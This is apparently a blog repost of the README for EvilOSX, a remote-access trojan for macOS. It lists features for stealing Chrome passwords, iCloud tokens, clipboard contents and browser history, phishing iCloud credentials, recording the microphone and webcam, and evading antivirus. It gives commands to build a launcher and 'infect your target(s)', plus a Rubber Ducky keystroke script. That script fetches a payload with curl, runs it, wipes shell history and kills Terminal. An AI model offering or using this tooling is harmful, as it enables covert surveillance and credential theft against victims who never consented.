EvilOSX - An Evil RAT (Remote Administration Tool) For macOS/OS X

An evil RAT (Remote Administration Tool) for macOS / OS X.

  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

Normal users
The server side requires python3 to run.
The bot side is written in python2 which is already installed on macOS / OS X.

Once python3 is installed, open a terminal and type the following:
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Start listening for connections
$ python3 start.py

# Lastly, run the built launcher (see the builder tab) on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users
There is also a command line interface for those who want to use this over SSH:
# Create a launcher to infect your target(s)
$ python3 builder.py

# Start listening for connections
$ python3 start.py --cli --port 1337

# Lastly, run the built launcher on your target(s)


This project was created to be used with Rubber Ducky, here's the simple script:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
STRING Termina
DELAY 1000
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.

EvilOSX - An Evil RAT (Remote Administration Tool) For macOS/OS X EvilOSX - An Evil RAT (Remote Administration Tool) For macOS/OS X Reviewed by Lydecker Black on 5:39 PM Rating: 5